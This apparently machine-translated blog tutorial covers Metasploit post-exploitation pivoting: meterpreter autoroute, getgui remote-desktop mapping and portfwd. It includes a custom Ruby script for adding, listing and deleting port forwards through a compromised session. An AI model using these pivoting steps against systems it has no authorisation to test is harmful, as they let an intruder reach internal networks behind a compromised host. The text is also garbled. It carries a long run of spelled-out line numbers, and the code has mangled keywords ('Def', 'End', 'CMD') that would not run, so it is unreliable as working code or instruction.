The most exciting thing about the first contact with MSF is the springboard function. By adding the routing function through MSF, you can directly use MSF to connect the internal network that cannot be accessed originally (establishing the access connection is the first step of penetration). Once you establish the connection, you can do whatever you want.
Use the autoroute function of meterpreter to complete the operation. First, use get local subnets script to get the local subnet of the controlled system, and then use autoroute script to add routes. After this operation, you will see the added routing table. The gateway is session 3, or payload program. If I specify the IP address of a module as 192.168.244. * in MSF, it will be forwarded through the session3 gateway to access the target IP
There is also a frequently used network mapping function with which to establish network connection. There is a getgui script in the meterpreter (there are many written scripts in my BT script storage path / opt / Metasploit / msf3 / scripts / meterpreter, as shown in the following figure)
According to the Metasploit penetration test guide, getgui can map the remote 3389 to the local specified port, which is a network mapping process.
See how to use it. It's very simple. Here, I don't add a user name and password, but directly establish a connection. Run run getgui - E - f 8080
Connection established after execution
The connection can be established and the forwarding is successful.
But in penetration testing, the requirements are always changing, and there have been requirements before. Is it possible to map and connect a port of the intranet? With this problem in mind, I took a look at the implementation code of getgui.
I haven't learned ruby, but after reading this code, it's easy to understand that when run getgui - E - f 8080 is executed just now, frwrd variable is set to true if - F is included. And save the port after - F to the variable lport. When frwrd is true, portfwd add - L 0.0.0.0 - L {lport} - P 3389 - R 127.0.0.1 will be called to map the remote 3389 (127.0.0.1 relative to the payload) to the local specified port.
It can be seen that only this command is needed to establish network mapping. Search the file where the command is located:
The discovery is defined in / opt / Metasploit / msf3 / lib / Rex / post / meterpreter / UI / console / command_dispatcher / stdapi / net.rb.
It should be the specific implementation of the command. It's easy to see from the parameters. Meaning of each parameter.
You can see that many commands are supported, such as add, delete, list, etc.
So, follow the cat and draw the tiger. If I want to map port 10081 of the remote host to port 10081 of the local host, how to implement it?
Just a word
client.run_cmd(“portfwd add -L 0.0.0.0 -l 10081 -p 10081 -r 127.0.0.1”)
Create changeport.rb in the directory / opt / Metasploit / msf3 / scripts / meterpreter
Run the script you created
Look at the port status:
Mapping succeeded.
As you can see from the command of portfwd just now, it supports the commands of add, delete and list. Therefore, we can continue to enrich our own scripts and implement such a function as adding port mapping, deleting port mapping and viewing port mapping. You can write the following script
One
Two
Three
Four
Five
Six
Seven
Eight
Nine
Ten
Eleven
Twelve
Thirteen
Fourteen
Fifteen
Sixteen
Seventeen
Eighteen
Nineteen
Twenty
Twenty-one
Twenty-two
Twenty-three
Twenty-four
Twenty-five
Twenty-six
Twenty-seven
Twenty-eight
Twenty-nine
Thirty
Thirty-one
Thirty-two
Thirty-three
Thirty-four
Thirty-five
Thirty-six
Thirty-seven
Thirty-eight
Thirty-nine
Forty
Forty-one
Forty-two
Forty-three
Forty-four
Forty-five
Forty-six
Forty-seven
Forty-eight
Forty-nine
Fifty
Fifty-one
Fifty-two
Fifty-three
Fifty-four
Fifty-five
Fifty-six
Fifty-seven
Fifty-eight
Fifty-nine
Sixty
Sixty-one
Sixty-two
Sixty-three
Sixty-four
Sixty-five
Sixty-six
Sixty-seven
Sixty-eight
Sixty-nine
Seventy
Seventy-one
Seventy-two
Seventy-three
Seventy-four
Seventy-five
Seventy-six
Seventy-seven
Seventy-eight
Seventy-nine
Eighty
Eighty-one
Eighty-two
Eighty-three
Eighty-four
Eighty-five
Eighty-six
Eighty-seven
Eighty-eight
Eighty-nine
Ninety
Ninety-one
Ninety-two
Ninety-three
Ninety-four
Ninety-five
Ninety-six
Ninety-seven
Ninety-eight
Ninety-nine
One hundred
One hundred and one
One hundred and two
One hundred and three
One hundred and four
One hundred and five
One hundred and six
One hundred and seven
One hundred and eight
One hundred and nine
One hundred and ten
One hundred and eleven
One hundred and twelve
One hundred and thirteen
One hundred and fourteen
One hundred and fifteen
One hundred and sixteen
One hundred and seventeen
One hundred and eighteen
One hundred and nineteen
One hundred and twenty
One hundred and twenty-one
One hundred and twenty-two
One hundred and twenty-three
One hundred and twenty-four
One hundred and twenty-five
One hundred and twenty-six
One hundred and twenty-seven
One hundred and twenty-eight
One hundred and twenty-nine
One hundred and thirty
One hundred and thirty-one
One hundred and thirty-two
One hundred and thirty-three
One hundred and thirty-four
One hundred and thirty-five
One hundred and thirty-six
One hundred and thirty-seven
One hundred and thirty-eight
One hundred and thirty-nine
One hundred and forty
One hundred and forty-one
One hundred and forty-two
One hundred and forty-three
# Author: buchedan.org
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ true, "Help menu." ],
"-c" => [ true, "include -add -list -del. " ],
"-l" => [ true, "localport and it is not using." ],
"-r" => [ true, "remoteip of trying to connect." ],
"-p" => [ true, "remoteport of trying to connect." ]
)
Def usage
print_line("portfwd ")
print_line("Usage: changeport -c add -l <localport> -r <remoteip> -p <remoteport>")
print_line("Usage: changeport -c list ")
print_line("Usage: changeport -c del -l <localport> ")
print(@@exec_opts.usage)
raise Rex::Script::Completed
End
Def message
print_status "portfwd remoteip port to localport"
print_status "http://buchedan.org"
End
################## MAIN ##################
# Parsing of Options
CMD = nil
Lport = nil
rip = nil
Rport = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-c"
cmd = val
when "-h"
usage
when "-l"
lport = val
when "-r"
rip = val
when "-p"
rport = val
end
}
if client.platform =~ /win32|win64/
if args.length > 0
# show info
message
case cmd
when "list"
client.run_cmd("portfwd list")
when "add"
if (!lport or !rip or !rport)
print_error("You must supply a local port, remote host, and remote port.")
return
end
client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p #{rport} -r #{rip}")
#print_status("Starting the #{rip}:#{rport} forwarding at local port #{lport}")
when "del"
if(!lport)
print_error("You must supply a local port.")
return
else
client.run_cmd("portfwd delete -L 0.0.0.0 -l #{lport}")
end
end
else
usage
end
Else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
End
Put it under / opt / Metasploit / msf3 / scripts / meterpreter
Usage demonstration
It can display help information, establish mapping, display mapping and delete mapping. Of course, birdsong is not well written. Only you can understand it.
Later, I suddenly look back and find out how much I used to be. 2. The meterpreter itself has this portfwd function, which can be used directly. I really took off my pants and farted. Add, list and delete are fully implemented.
summary
This paper mainly studies that LCX is used for port forwarding, two intranet machines (target machine and MSF) are connected, and msfpayload is used as the springboard to continue penetration. Finally, it is to simply implement port mapping and understand the basic mterpreter script programming.
Remarks:
In this paper, we take the example of payload under windows, in fact, MSF supports many kinds of scripts to establish the connection.
Related article link: Metasploit post penetration skills [1]